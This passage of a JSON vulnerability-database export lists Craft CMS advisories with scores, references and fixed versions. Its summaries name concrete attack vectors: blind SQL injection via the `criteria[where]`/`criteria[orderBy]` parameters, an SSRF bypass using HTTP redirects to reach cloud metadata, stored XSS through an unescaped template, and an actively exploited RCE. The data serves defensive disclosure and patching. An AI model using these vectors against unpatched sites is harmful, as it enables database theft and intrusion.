
v2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.0-beta.1","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.0-beta.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25497","reference_id":"CVE-2026-25497","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25497"},{"reference_url":"https://github.com/advisories/GHSA-fxp3-g6gw-4r4v","reference_id":"GHSA-fxp3-g6gw-4r4v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fxp3-g6gw-4r4v"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-fxp3-g6gw-4r4v","reference_id":"GHSA-fxp3-g6gw-4r4v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-fxp3-g6gw-4r4v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerabil
ity":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-25497","GHSA-fxp3-g6gw-4r4v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kbrc-85av-nfcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50612?format=json","vulnerability_id":"VCID-m5rf-usae-yfb7","summary":"Craft CMS Vulnerable to Stored XSS in Settings Names and Field Options\nStored XSS in multiple settings. 
Names/labels are rendered without escaping by the `checkbox.twig` template, which outputs them with `{{ label|raw }}` and so bypasses Twig's auto-escaping.\n\n---","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2"},{"reference_url":"https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276"},{"reference_url":"https://github.com/advisories/GHSA-4mgv-366x-qxvx","reference_id":"GHSA-4mgv-366x-qxvx","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4mgv-366x-qxvx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4mgv-366x-qxvx","reference_id":"GHSA-4mgv-366x-qxvx","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scorin
g_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4mgv-366x-qxvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["GHSA-4mgv-366x-qxvx"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m5rf-usae-yfb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91453?format=json","vulnerability_id":"VCID-nmzu-mefv-tqeh","summary":"Craft CMS' anonymous \"assets/image-editor\" calls return private asset editor metadata to unauthorized users\n### Summary\n\nA low-privileged authenticated user can call `assets/image-editor` with the ID of a private asset they cannot view and still receive editor response data, including `focalPoint`.\n\nThe endpoint returns 
private editing metadata without per-asset authorization validation.\n\nRoot-cause analysis:\n\n1. `actionImageEditor()` accepts `assetId` from the request body.\n2. The asset is loaded, and the focal-point data is read.\n3. The response returns `html` and `focalPoint`.\n4. No per-asset authorization check (whether the current user is allowed to view that asset) is applied before the response is returned.\n\n### Impact\n\n**Affected deployments:**\n\n* Craft sites where asset edit metadata should remain restricted to authorized users.\n\n**Security consequence:**\n\n* Authenticated users who are not permitted to view an asset can extract its private editor metadata and related editor context.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33161","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1307","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33161"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements"
:"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33161","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33161"},{"reference_url":"https://github.com/advisories/GHSA-vgjg-248p-rfm2","reference_id":"GHSA-vgjg-248p-rfm2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vgjg-248p-rfm2"}],"fixed_packages":[{"url":"http://public2.vulnera
blecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33161","GHSA-vgjg-248p-rfm2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nmzu-mefv-tqeh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50867?format=json","vulnerability_id":"VCID-pgm4-svq8-tfc5","summary":"CraftCMS's `ElementSearchController` Affected by Blind SQL Injection\nThe `ElementSearchController::actionSearch()` endpoint is missing the `unset()` protection that\nwas added to ElementIndexesController in [GHSA-2453-mppf-46cj](https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj).\n\nThe exact same SQL injection vulnerability (including `criteria[orderBy]`, the original advisory vector) works on this controller because the fix was never applied to it.\n\nAny authenticated control panel user (no admin required) can inject arbitrary SQL via `criteria[where]`,\n`criteria[orderBy]`, or other query properties, and extract the full database contents via boolean-based blind injection.\n\nUsers should update to the patched 5.9.9 release to mitigate the 
issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31858","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13534","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31858"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e1a3dd669ae31491b86ad996e88a1d30d33d9a42","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:01:02Z/"}],"url":"https://github.com/craftcms/cms/commit/e1a3dd669ae31491b86ad996e88a1d30d33d9a42"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31858","reference_id":"CVE-2026-31858","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31858"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms
/cms/security/advisories/GHSA-2453-mppf-46cj"},{"reference_url":"https://github.com/advisories/GHSA-g7j6-fmwx-7vp8","reference_id":"GHSA-g7j6-fmwx-7vp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g7j6-fmwx-7vp8"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-g7j6-fmwx-7vp8","reference_id":"GHSA-g7j6-fmwx-7vp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:01:02Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-g7j6-fmwx-7vp8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74806?format=json","purl":"pkg:composer/craftcms/cms@5.9.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.9"}],"aliases":["CVE-2026-31858","GHSA-g7j6-fmwx-7vp8"],"risk_
score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pgm4-svq8-tfc5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50080?format=json","vulnerability_id":"VCID-ppet-ruae-1kav","summary":"Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via HTTP Redirect\nThe `saveAsset` GraphQL mutation validates the initial URL hostname and resolved IP against a blocklist, but Guzzle follows HTTP redirects by default. An attacker can bypass all SSRF protections by hosting a redirect that points to cloud metadata endpoints or any internal IP addresses.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25493","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05057","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25493"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/0974055634af68998f67850ab2045d8aaa19fa98","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements"
:""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/commit/0974055634af68998f67850ab2045d8aaa19fa98"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25493","reference_id":"CVE-2026-25493","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25493"},{"reference_url":"https://github.com/ad
visories/GHSA-8jr8-7hr4-vhfx","reference_id":"GHSA-8jr8-7hr4-vhfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jr8-7hr4-vhfx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-8jr8-7hr4-vhfx","reference_id":"GHSA-8jr8-7hr4-vhfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-8jr8-7hr4-vhfx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpe
a-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25493","GHSA-8jr8-7hr4-vhfx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ppet-ruae-1kav"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57189?format=json","vulnerability_id":"VCID-qq68-3j4y-47am","summary":"Craft CMS Allows Remote Code Execution\nThis is an additional fix for https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g\n\nThis is a high-impact, low-complexity attack vector. 
To mitigate the issue, users running Craft installations before the fixed versions are encouraged to update to at least those versions. The references below include a CISA Known Exploited Vulnerabilities catalog entry, a public exploit, and a report of an in-the-wild campaign, so this should be treated as actively exploited and patched urgently.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"0.93094","scoring_system":"epss","scoring_elements":"0.99798","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32432"},{"reference_url":"https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C